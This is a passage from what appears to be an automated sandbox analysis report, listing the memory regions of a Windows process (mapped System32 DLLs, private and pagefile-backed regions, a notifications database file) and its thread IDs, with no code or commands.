"c:\\windows\\system32\\bcp47langs.dll") Region: id = 6091 start_va = 0x7ff8f9b60000 end_va = 0x7ff8f9c01fff monitored = 0 entry_point = 0x7ff8f9b80a40 region_type = mapped_file name = "dxgi.dll" filename = "\\Windows\\System32\\dxgi.dll" (normalized: "c:\\windows\\system32\\dxgi.dll") Region: id = 6092 start_va = 0x7ff8f9c10000 end_va = 0x7ff8f9eb7fff monitored = 0 entry_point = 0x7ff8f9ca3250 region_type = mapped_file name = "d3d11.dll" filename = "\\Windows\\System32\\d3d11.dll" (normalized: "c:\\windows\\system32\\d3d11.dll") Region: id = 6093 start_va = 0x7ff8f9ec0000 end_va = 0x7ff8f9ee1fff monitored = 0 entry_point = 0x7ff8f9ec1a40 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\System32\\dwmapi.dll" (normalized: "c:\\windows\\system32\\dwmapi.dll") Region: id = 6094 start_va = 0x7ff8f9fd0000 end_va = 0x7ff8fa0b2fff monitored = 0 entry_point = 0x7ff8fa007da0 region_type = mapped_file name = "dcomp.dll" filename = "\\Windows\\System32\\dcomp.dll" (normalized: "c:\\windows\\system32\\dcomp.dll") Region: id = 6095 start_va = 0x7ff8fa3c0000 end_va = 0x7ff8fa438fff monitored = 0 entry_point = 0x7ff8fa3dfb90 region_type = mapped_file name = "apphelp.dll" filename = "\\Windows\\System32\\apphelp.dll" (normalized: "c:\\windows\\system32\\apphelp.dll") Region: id = 6096 start_va = 0x7ff8fa440000 end_va = 0x7ff8fa5c5fff monitored = 0 entry_point = 0x7ff8fa48d700 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 6097 start_va = 0x7ff8fa5d0000 end_va = 0x7ff8fa5ebfff monitored = 0 entry_point = 0x7ff8fa5d37a0 region_type = mapped_file name = "samlib.dll" filename = "\\Windows\\System32\\samlib.dll" (normalized: "c:\\windows\\system32\\samlib.dll") Region: id = 6098 start_va = 0x7ff8fa630000 end_va = 0x7ff8fa642fff monitored = 0 entry_point = 0x7ff8fa632760 region_type = mapped_file name = "wtsapi32.dll" filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll") Region: id = 6099 start_va = 0x7ff8fa650000 end_va = 0x7ff8fa674fff monitored = 0 entry_point = 0x7ff8fa652300 region_type = mapped_file name = "sppc.dll" filename = "\\Windows\\System32\\sppc.dll" (normalized: "c:\\windows\\system32\\sppc.dll") Region: id = 6100 start_va = 0x7ff8fa6b0000 end_va = 0x7ff8fa6d4fff monitored = 0 entry_point = 0x7ff8fa6c5220 region_type = mapped_file name = "slc.dll" filename = "\\Windows\\System32\\slc.dll" (normalized: "c:\\windows\\system32\\slc.dll") Region: id = 6101 start_va = 0x7ff8fa870000 end_va = 0x7ff8fa905fff monitored = 0 entry_point = 0x7ff8fa895570 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Region: id = 6102 start_va = 0x7ff8fa910000 end_va = 0x7ff8fa936fff monitored = 0 entry_point = 0x7ff8fa917940 region_type = mapped_file name = "devobj.dll" filename = "\\Windows\\System32\\devobj.dll" (normalized: "c:\\windows\\system32\\devobj.dll") Region: id = 6103 start_va = 0x7ff8faa10000 end_va = 0x7ff8fab0ffff monitored = 0 entry_point = 0x7ff8faa50f80 region_type = mapped_file name = "twinapi.appcore.dll" filename = "\\Windows\\System32\\twinapi.appcore.dll" (normalized: "c:\\windows\\system32\\twinapi.appcore.dll") Region: id = 6104 start_va = 0x7ff8fb260000 end_va = 0x7ff8fb2b5fff monitored = 0 entry_point = 0x7ff8fb270bf0 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll") Region: id = 6105 start_va = 0x7ff8fb6b0000 end_va = 0x7ff8fb6cefff monitored = 0 entry_point = 0x7ff8fb6b5d30 region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\System32\\userenv.dll" (normalized: "c:\\windows\\system32\\userenv.dll") Region: id = 6106 start_va = 0x7ff8fb8d0000 end_va = 0x7ff8fb8e6fff monitored = 0 entry_point = 0x7ff8fb8d79d0 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 6107 start_va = 0x7ff8fbbd0000 end_va = 0x7ff8fbbfcfff monitored = 0 entry_point = 0x7ff8fbbe9d40 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 6108 start_va = 0x7ff8fbd80000 end_va = 0x7ff8fbda8fff monitored = 0 entry_point = 0x7ff8fbd94530 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll") Region: id = 6109 start_va = 0x7ff8fbef0000 end_va = 0x7ff8fbf3afff monitored = 0 entry_point = 0x7ff8fbef35f0 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 6110 start_va = 0x7ff8fbf40000 end_va = 0x7ff8fbf4efff monitored = 0 entry_point = 0x7ff8fbf43210 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 6111 start_va = 0x7ff8fbf50000 end_va = 0x7ff8fbf63fff monitored = 0 entry_point = 0x7ff8fbf552e0 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 6112 start_va = 0x7ff8fbf70000 end_va = 0x7ff8fbf7ffff monitored = 0 entry_point = 0x7ff8fbf756e0 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll") Region: id = 6113 start_va = 0x7ff8fbf80000 end_va = 0x7ff8fc5c3fff monitored = 0 entry_point = 0x7ff8fc1464b0 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\System32\\windows.storage.dll" (normalized: "c:\\windows\\system32\\windows.storage.dll") Region: id = 6114 start_va = 0x7ff8fc5d0000 end_va = 0x7ff8fc7b7fff monitored = 0 entry_point = 0x7ff8fc5fba70 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 6115 start_va = 0x7ff8fc870000 end_va = 0x7ff8fc8d9fff monitored = 0 entry_point = 0x7ff8fc8a6d50 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll") Region: id = 6116 start_va = 0x7ff8fc8e0000 end_va = 0x7ff8fc934fff monitored = 0 entry_point = 0x7ff8fc8f7970 region_type = mapped_file name = "wintrust.dll" filename = "\\Windows\\System32\\wintrust.dll" (normalized: "c:\\windows\\system32\\wintrust.dll") Region: id = 6117 start_va = 0x7ff8fc940000 end_va = 0x7ff8fc982fff monitored = 0 entry_point = 0x7ff8fc954b50 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 6118 start_va = 0x7ff8fc9b0000 end_va = 0x7ff8fca64fff monitored = 0 entry_point = 0x7ff8fc9f22e0 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll") Region: id = 6119 start_va = 0x7ff8fca70000 end_va = 0x7ff8fcc36fff monitored = 0 entry_point = 0x7ff8fcacdb80 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll") Region: id = 6120 start_va = 0x7ff8fccd0000 end_va = 0x7ff8fcf4cfff monitored = 0 entry_point = 0x7ff8fcda4970 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 6121 start_va = 0x7ff8fcf50000 end_va = 0x7ff8fcfbefff monitored = 0 entry_point = 0x7ff8fcf75f70 region_type = mapped_file name = "coml2.dll" filename = "\\Windows\\System32\\coml2.dll" (normalized: "c:\\windows\\system32\\coml2.dll") Region: id = 6122 start_va = 0x7ff8fcfc0000 end_va = 0x7ff8fd0dbfff monitored = 0 entry_point = 0x7ff8fd0002b0 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 6123 start_va = 0x7ff8fd1f0000 end_va = 0x7ff8fd29cfff monitored = 0 entry_point = 0x7ff8fd2081a0 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 6124 start_va = 0x7ff8fd6d0000 end_va = 0x7ff8fd70afff monitored = 0 entry_point = 0x7ff8fd6d12f0 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 6125 start_va = 0x7ff8fd710000 end_va = 0x7ff8fd869fff monitored = 0 entry_point = 0x7ff8fd7538e0 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 6126 start_va = 0x7ff8fd870000 end_va = 0x7ff8fd9f5fff monitored = 0 entry_point = 0x7ff8fd8bffc0 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 6127 start_va = 0x7ff8fda00000 end_va = 0x7ff8fdb55fff monitored = 0 entry_point = 0x7ff8fda0a8d0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 6128 start_va = 0x7ff8fdb60000 end_va = 0x7ff8fdc06fff monitored = 0 entry_point = 0x7ff8fdb6b4d0 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 6129 start_va = 0x7ff8fdc10000 end_va = 0x7ff8fdcb6fff monitored = 0 entry_point = 0x7ff8fdc258d0 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 6130 start_va = 0x7ff8fdd40000 end_va = 0x7ff8fde82fff monitored = 0 entry_point = 0x7ff8fdd68210 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 6131 start_va = 0x7ff8fdf10000 end_va = 0x7ff8fdfd0fff monitored = 0 entry_point = 0x7ff8fdf30da0 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 6132 start_va = 0x7ff8fdfe0000 end_va = 0x7ff8fe031fff monitored = 0 entry_point = 0x7ff8fdfef530 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 6133 start_va = 0x7ff8fe040000 end_va = 0x7ff8fe09afff monitored = 0 entry_point = 0x7ff8fe0538b0 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 6134 start_va = 0x7ff8fe0a0000 end_va = 0x7ff8fe13cfff monitored = 0 entry_point = 0x7ff8fe0a78a0 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 6135 start_va = 0x7ff8fe1a0000 end_va = 0x7ff8ff6fefff monitored = 0 entry_point = 0x7ff8fe3011f0 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 6136 start_va = 0x7ff8ff8d0000 end_va = 0x7ff8ffa90fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 6137 start_va = 0x4370000 end_va = 0x43effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004370000" filename = "" Region: id = 6138 start_va = 0x7ff8f51f0000 end_va = 0x7ff8f5230fff monitored = 0 entry_point = 0x7ff8f51f4840 region_type = mapped_file name = "usermgrproxy.dll" filename = "\\Windows\\System32\\UserMgrProxy.dll" (normalized: "c:\\windows\\system32\\usermgrproxy.dll") Region: id = 6139 start_va = 0x43f0000 end_va = 0x446ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000043f0000" filename = "" Region: id = 6140 start_va = 0x7ff8f32b0000 end_va = 0x7ff8f350cfff monitored = 0 entry_point = 0x7ff8f3338610 region_type = mapped_file name = "twinui.appcore.dll" filename = "\\Windows\\System32\\twinui.appcore.dll" (normalized: "c:\\windows\\system32\\twinui.appcore.dll") Region: id = 6141 start_va = 0x7ff8f9f10000 end_va = 0x7ff8f9fcdfff monitored = 0 entry_point = 0x7ff8f9f52d40 region_type = mapped_file name = "coremessaging.dll" filename = "\\Windows\\System32\\CoreMessaging.dll" (normalized: "c:\\windows\\system32\\coremessaging.dll") Region: id = 6142 start_va = 0x7ff8f3f90000 end_va = 0x7ff8f4217fff monitored = 0 entry_point = 0x7ff8f3fef670 region_type = mapped_file name = "coreuicomponents.dll" filename = "\\Windows\\System32\\CoreUIComponents.dll" (normalized: "c:\\windows\\system32\\coreuicomponents.dll") Region: id = 6143 start_va = 0x7ff8f1c70000 end_va = 0x7ff8f1d8ffff monitored = 0 entry_point = 0x7ff8f1ca8310 region_type = mapped_file name = "applicationframe.dll" filename = "\\Windows\\System32\\ApplicationFrame.dll" (normalized: "c:\\windows\\system32\\applicationframe.dll") Region: id = 6160 start_va = 0x7ff8f89b0000 end_va = 0x7ff8f8ef4fff monitored = 0 entry_point = 0x7ff8f8b4a450 region_type = mapped_file name = "d2d1.dll" filename = "\\Windows\\System32\\d2d1.dll" (normalized: "c:\\windows\\system32\\d2d1.dll") Region: id = 6161 start_va = 0x4470000 end_va = 0x44effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004470000" filename = "" Region: id = 6162 start_va = 0x44f0000 end_va = 0x4ceffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000044f0000" filename = "" Region: id = 6163 start_va = 0x4cf0000 end_va = 0x4d6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004cf0000" filename = "" Region: id = 6164 start_va = 0x7ff8f1b80000 end_va = 0x7ff8f1c59fff monitored = 0 entry_point = 0x7ff8f1bb3c00 region_type = mapped_file name = "wpncore.dll" filename = "\\Windows\\System32\\wpncore.dll" (normalized: "c:\\windows\\system32\\wpncore.dll") Region: id = 6165 start_va = 0x7ff8f5eb0000 end_va = 0x7ff8f5f77fff monitored = 0 entry_point = 0x7ff8f5ef13f0 region_type = mapped_file name = "winhttp.dll" filename = "\\Windows\\System32\\winhttp.dll" (normalized: "c:\\windows\\system32\\winhttp.dll") Region: id = 6166 start_va = 0x7ff8f1af0000 end_va = 0x7ff8f1b75fff monitored = 0 entry_point = 0x7ff8f1b11e10 region_type = mapped_file name = "notificationcontroller.dll" filename = "\\Windows\\System32\\NotificationController.dll" (normalized: "c:\\windows\\system32\\notificationcontroller.dll") Region: id = 6167 start_va = 0x7ff8f3b70000 end_va = 0x7ff8f3bbafff monitored = 0 entry_point = 0x7ff8f3b87b70 region_type = mapped_file name = "veeventdispatcher.dll" filename = "\\Windows\\System32\\VEEventDispatcher.dll" (normalized: "c:\\windows\\system32\\veeventdispatcher.dll") Region: id = 6168 start_va = 0x7ff8f1ac0000 end_va = 0x7ff8f1aeafff monitored = 0 entry_point = 0x7ff8f1ac4240 region_type = mapped_file name = "abovelockapphost.dll" filename = "\\Windows\\System32\\AboveLockAppHost.dll" (normalized: "c:\\windows\\system32\\abovelockapphost.dll") Region: id = 6169 start_va = 0x4df0000 end_va = 0x4e6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004df0000" filename = "" Region: id = 6170 start_va = 0x7ff8f1a90000 end_va = 0x7ff8f1ab5fff monitored = 0 entry_point = 0x7ff8f1aa5cb0 region_type = mapped_file name = "npsm.dll" filename = "\\Windows\\System32\\NPSM.dll" (normalized: "c:\\windows\\system32\\npsm.dll") Region: id = 6171 start_va = 0x4e70000 end_va = 0x4eeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004e70000" filename = "" Region: id = 6172 start_va = 0x40e0000 end_va = 0x4128fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000040e0000" filename = "" Region: id = 6173 start_va = 0x4ef0000 end_va = 0x4feffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004ef0000" filename = "" Region: id = 6174 start_va = 0x4ff0000 end_va = 0x7371fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "appdb.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Notifications\\appdb.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\notifications\\appdb.dat") Region: id = 6175 start_va = 0x7380000 end_va = 0x73fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007380000" filename = "" Region: id = 6176 start_va = 0x7400000 end_va = 0x747ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007400000" filename = "" Region: id = 6177 start_va = 0x3ee0000 end_va = 0x3eeffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003ee0000" filename = "" Region: id = 6178 start_va = 0x3ee0000 end_va = 0x3eeffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003ee0000" filename = "" Region: id = 6179 start_va = 0x3ee0000 end_va = 0x3eeffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003ee0000" filename = "" Region: id = 6180 start_va = 0x7480000 end_va = 0x74fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007480000" filename = "" Region: id = 6181 start_va = 0x7500000 end_va = 0x757ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007500000" filename = "" Region: id = 6182 start_va = 0x7ff8f3510000 end_va = 0x7ff8f3524fff monitored = 0 entry_point = 0x7ff8f3511ab0 region_type = mapped_file name = "execmodelproxy.dll" filename = "\\Windows\\System32\\execmodelproxy.dll" (normalized: "c:\\windows\\system32\\execmodelproxy.dll") Region: id = 6183 start_va = 0x7580000 end_va = 0x75fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007580000" filename = "" Region: id = 6189 start_va = 0x7600000 end_va = 0x767ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007600000" filename = "" Region: id = 6190 start_va = 0x7ff8f5990000 end_va = 0x7ff8f5a3dfff monitored = 0 entry_point = 0x7ff8f59a80c0 region_type = mapped_file name = "windows.networking.connectivity.dll" filename = "\\Windows\\System32\\Windows.Networking.Connectivity.dll" (normalized: "c:\\windows\\system32\\windows.networking.connectivity.dll") Region: id = 6191 start_va = 0x7ff8f45f0000 end_va = 0x7ff8f45fdfff monitored = 0 entry_point = 0x7ff8f45f1460 region_type = mapped_file name = "npmproxy.dll" filename = "\\Windows\\System32\\npmproxy.dll" (normalized: "c:\\windows\\system32\\npmproxy.dll") Region: id = 6192 start_va = 0x7680000 end_va = 0x76fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007680000" filename = "" Region: id = 6193 start_va = 0x7ff8f1910000 end_va = 0x7ff8f191bfff monitored = 0 entry_point = 0x7ff8f19114b0 region_type = mapped_file name = "notificationcontrollerps.dll" filename = "\\Windows\\System32\\NotificationControllerPS.dll" (normalized: "c:\\windows\\system32\\notificationcontrollerps.dll") Region: id = 6194 start_va = 0x7ff8f51a0000 end_va = 0x7ff8f51d7fff monitored = 0 entry_point = 0x7ff8f51b8cc0 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll") Region: id = 6195 start_va = 0x7ff8fdd30000 end_va = 0x7ff8fdd37fff monitored = 0 entry_point = 0x7ff8fdd31ea0 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 6196 start_va = 0x7ff8f5f80000 end_va = 0x7ff8f5fe0fff monitored = 0 entry_point = 0x7ff8f5f84b50 region_type = mapped_file name = "wlanapi.dll" filename = "\\Windows\\System32\\wlanapi.dll" (normalized: "c:\\windows\\system32\\wlanapi.dll") Region: id = 6197 start_va = 0x7ff8f18f0000 end_va = 0x7ff8f1905fff monitored = 0 entry_point = 0x7ff8f18f1d50 region_type = mapped_file name = "wwapi.dll" filename = "\\Windows\\System32\\wwapi.dll" (normalized: "c:\\windows\\system32\\wwapi.dll") Region: id = 6198 start_va = 0x7ff8f18c0000 end_va = 0x7ff8f18e1fff monitored = 0 entry_point = 0x7ff8f18c2580 region_type = mapped_file name = "wcmapi.dll" filename = "\\Windows\\System32\\wcmapi.dll" (normalized: "c:\\windows\\system32\\wcmapi.dll") Region: id = 6210 start_va = 0x7ff8facb0000 end_va = 0x7ff8facd9fff monitored = 0 entry_point = 0x7ff8facb8b90 region_type = mapped_file name = "rmclient.dll" filename = "\\Windows\\System32\\rmclient.dll" (normalized: "c:\\windows\\system32\\rmclient.dll") Region: id = 6211 start_va = 0x7ff8fdea0000 end_va = 0x7ff8fdf0afff monitored = 0 entry_point = 0x7ff8fdeb90c0 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 6212 start_va = 0x7ff8f4340000 end_va = 0x7ff8f4354fff monitored = 0 entry_point = 0x7ff8f4342dc0 region_type = mapped_file name = "ondemandconnroutehelper.dll" filename = "\\Windows\\System32\\OnDemandConnRouteHelper.dll" (normalized: "c:\\windows\\system32\\ondemandconnroutehelper.dll") Region: id = 6213 start_va = 0x7ff8f42c0000 end_va = 0x7ff8f433ffff monitored = 0 entry_point = 0x7ff8f42ed280 region_type = mapped_file name = "webio.dll" filename = "\\Windows\\System32\\webio.dll" (normalized: "c:\\windows\\system32\\webio.dll") Region: id = 6214 start_va = 0x7ff8fb820000 end_va = 0x7ff8fb87bfff monitored = 0 entry_point = 0x7ff8fb836f70 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\System32\\mswsock.dll" (normalized: "c:\\windows\\system32\\mswsock.dll") Region: id = 6215 start_va = 0x7ff8f51e0000 end_va = 0x7ff8f51eafff monitored = 0 entry_point = 0x7ff8f51e1d30 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll") Region: id = 6217 start_va = 0x3ee0000 end_va = 0x3ee4fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "winnlsres.dll" filename = "\\Windows\\System32\\winnlsres.dll" (normalized: "c:\\windows\\system32\\winnlsres.dll") Region: id = 6218 start_va = 0x4130000 end_va = 0x413ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "winnlsres.dll.mui" filename = "\\Windows\\System32\\en-US\\winnlsres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\winnlsres.dll.mui") Region: id = 6219 start_va = 0x7ff8fa960000 end_va = 0x7ff8faa09fff monitored = 0 entry_point = 0x7ff8fa987910 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\System32\\dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll") Region: id = 6220 start_va = 0x7ff8f3720000 end_va = 0x7ff8f3729fff monitored = 0 entry_point = 0x7ff8f37214c0 region_type = mapped_file name = "rasadhlp.dll" filename = "\\Windows\\System32\\rasadhlp.dll" (normalized: "c:\\windows\\system32\\rasadhlp.dll") Region: id = 6221 start_va = 0x7ff8f4990000 end_va = 0x7ff8f49f6fff monitored = 0 entry_point = 0x7ff8f49963e0 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 6222 start_va = 0x4d70000 end_va = 0x4d93fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004d70000" filename = "" Region: id = 6223 start_va = 0x4140000 end_va = 0x4148fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004140000" filename = "" Region: id = 6224 start_va = 0x4150000 end_va = 0x4158fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004150000" filename = "" Region: id = 6225 start_va = 0x4da0000 end_va = 0x4dc3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004da0000" filename = "" Region: id = 6226 start_va = 0x4dd0000 end_va = 0x4dd0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004dd0000" filename = "" Region: id = 6227 start_va = 0x7700000 end_va = 0x77fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007700000" filename = "" Region: id = 6228 start_va = 0x7ff8fb4a0000 end_va = 0x7ff8fb519fff monitored = 0 entry_point = 0x7ff8fb4c1a50 region_type = mapped_file name = "schannel.dll" filename = "\\Windows\\System32\\schannel.dll" (normalized: "c:\\windows\\system32\\schannel.dll") Thread: id = 406 os_tid = 0x704 Thread: id = 407 os_tid = 0x6fc Thread: id = 408 os_tid = 0x6f8 Thread: id = 409 os_tid = 0x6d8 Thread: id = 410 os_tid = 0x6f0 Thread: id = 411 os_tid = 0x6e8 Thread: id = 412 os_tid = 0x6e4 Thread: id = 413 os_tid = 0x6dc Thread: id = 414 os_tid = 0x6d4 Thread: id = 415 os_tid = 0x6d0 Thread: id = 416 os_tid = 0x6cc Thread: id = 417 os_tid = 0x6c8 Thread: id = 418 os_tid = 0x6c4 Thread: id = 419 os_tid = 0x6ac Thread: id = 420 os_tid = 0x69c Thread: id = 421 os_tid = 0x694 Thread: id = 422 os_tid = 0x708 Thread: id = 423 os_tid = 0x70c Thread: id = 425 os_tid = 0x710 Thread: id = 426 os_tid = 0x714 Thread: id = 427 os_tid = 0x718 Thread: id = 428 os_tid = 0x724 Thread: id = 430 os_tid = 0x728 Thread: id = 431 os_tid = 0x72c Thread: id = 433 os_tid = 0x734 Thread: id = 434 os_tid = 0x738 Thread: id = 435 os_tid = 0x73c Thread: id = 436 os_tid = 0x740 Thread: id = 437 os_tid = 0x748 Thread: id = 438 os_tid = 0x74c